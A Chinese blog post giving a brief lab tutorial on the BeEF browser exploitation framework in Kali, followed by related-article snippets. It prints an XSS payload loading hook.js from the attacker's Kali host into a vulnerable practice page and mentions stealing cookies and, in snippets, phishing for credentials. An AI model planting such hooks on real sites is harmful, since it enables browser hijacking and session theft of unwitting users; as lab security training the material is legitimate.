kali beef的使用

最新推荐文章于 2024-04-17 16:16:30 发布
最新推荐文章于 2024-04-17 16:16:30 发布
阅读量416 收藏
点赞数
分类专栏: 常见漏洞 文章标签: linux web javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pigzlfa/article/details/118500901
版权
  1. beef的安装
    可以直接安装也可以从源码安装,略
  2. beef安装好后,打开web登陆页面
http://192.168.102.130:3000/ui/panel

url为kali机地址,可以从配置文件中修改
在这里插入图片描述

3.把js加载进存在xss的地方(例pikachu)

payload:

 <script src='http://192.168.102.130:3000/hook.js'></script>

在这里插入图片描述
在这里插入图片描述
可以看到在不停的向102.130发起请求

使用beef中终端发送弹窗
在这里插入图片描述
在这里插入图片描述也可以直接获取cookie
在这里插入图片描述
总之功能挺多的,慢慢探索吧

在commands选项卡里
绿色:可以在目标浏览器上运行,且用户不会感到任何异常
橙色:可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转 等)
灰色:尚未针对此目标进行验证,即不知道能否可运行
红色:不可以执行但是可以尝试一下emm

pigzlfa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网安工具系列:kalibeef的基础使用
weixin_54626591的博客
04-07 832
kalibeef的基础使用
kali-beef攻击浏览器-运维安全详细笔记总结
06-30
kali-beef攻击浏览器-运维安全详细笔记总结
KaliBeef使用教程
weixin_43287317的博客
04-02 5223
KaliBeef使用教程
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 1017
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
Kali Linux-BeEF浏览器渗透框架
道阻且长,行则将至。
12-26 4615
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的 BeEF 渗透框架,通过一段编制好的JS代码控制目标主机 Win 7 虚拟机的浏览器,进而进行社会工程学攻击(发送钓鱼网页盗窃账户密码、恶意程序发送等)和其他攻击,同时演示借助 Win 7上搭建的DVWA靶场的存储型XSS漏洞自动触发JS攻击脚本(获取Cookie)。 环境说明 ...
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3394
Kali beef-xss实现Xss详细教程。
beef获取目标主机用户名和密码.docx
03-29
* 访问 Beef:在 Kali 主机浏览器中输入 http://192.168.1.2:3000/ui/panel,访问 Beef。 * 钓鱼攻击:使用 Beef 的社会工程学攻击功能,例如 Pretty Theft,窃取目标主机的用户名和密码。 四、Beef 的社会工程学...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务100:存储型XSS和BEEF浏览器框架.mp4 │ 任务101:CSRF.mp4 │ 任务102:WEBSHELL.mp4 │ 任务103:HTTPS.mp4 │ 任务104:SSL、TLS中间人.mp4 │ 任务105:SSL、TLS拒绝服务和补充概念.mp4 │ ├─第14章 ...
BeefAuto:无需配置路由器即可自动化 Beef 以通过广域网使用
07-24
python脚本自动化牛肉并通过使用ngrok打开端口将其配置为使用overwan 截图 安装 [ 卡利 ] git 克隆 cd BeefAuto 须藤 pip3 install -r requirements.txt 须藤 bash install.sh 须藤 python3 main.py 经过以下...
beef-installer:用于发行版和Termux的BeEF安装程序!
04-17
使用它以root身份运行: (为了): git clone https://github.com/tony23x/beef-install.git cd beef-installer;ls bash install.sh python3 beef-installer.py准备好了! 如果是disro,则牛肉目录将位于环境...
Metasploit+beef攻击实验
10-12
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。
kali,beef-xss安装及使用
m0_73581247的博客
06-22 1649
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
kalibeef的安装
hjhwdwdw的博客
12-23 603
接着输入beef-xss打开beef,会让你输入新的密码,账号密码初始默认都为beef(输入密码的时候不可见)安装beef输入以下命令。修改密码后会自动登录。
kalibeef使用
whoim_i的博客
11-03 2万+
目录一、beef介绍二、kali使用beef配置beef实际操作 一、beef介绍 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。...
kalibeef使用_kali没有beef,网络安全开发基础培训
最新发布
2301_76223496的博客
04-17 891
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。接着访问有勾子的页面http://192.168.133.131:3000/demos/basic.html 这里的主机名和端口号要按照你设置的来修改, 这里要注意一下kalibeef版本的勾子不支持IE8,最新版或者旧一些的版本可以。④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等。
xss利用之kali神器beef
热门推荐
jiangliuzheng的专栏
07-14 3万+
1、beef基本配置 BeEFKali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config.yaml 编辑 /usr/share/beef-xss/config.yaml metasploit: enable: false改为true 编辑 /usr/
kali 中安装 beef-xss
挖到0day了吗?
02-27 582
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。beef是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。本文将介绍安装beef。新版的kail已经不自带beef工具了,需要自己下载。
Kali BeEF MSF的使用
baynk的博客
05-14 1466
0x00 BeEF BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,是由ruby语言开发的专门针对浏览器攻击的框架。BeeF是前欧美最流行的web框架攻击平台,kali 集成BeEf,而且BeEf有很多好使的payload。例如BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机。 不过在目前,BeEF使用的人比较少,
kali beef安装
07-25
要在Kali Linux上安装BeEF(Browser Exploitation Framework),您可以按照以下步骤进行操作: 1. 打开终端并更新系统: ``` sudo apt update sudo apt upgrade ``` 2. 安装Ruby开发环境: ``` sudo apt install ruby ruby-dev ``` 3. 安装必要的依赖项: ``` sudo apt install build-essential libsqlite3-dev zlib1g-dev ``` 4. 安装BeEF: ``` sudo gem install beef ``` 5. 启动BeEF: ``` beef-xss ``` 6. 打开Web浏览器并访问 `http://localhost:3000/ui/panel`,这将打开BeEF的管理界面。 请注意,BeEF是一个强大的工具,仅限于合法和道德的目的使用。滥用此工具可能会违反法律和道德准则,请确保仅在合法和授权的环境中使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值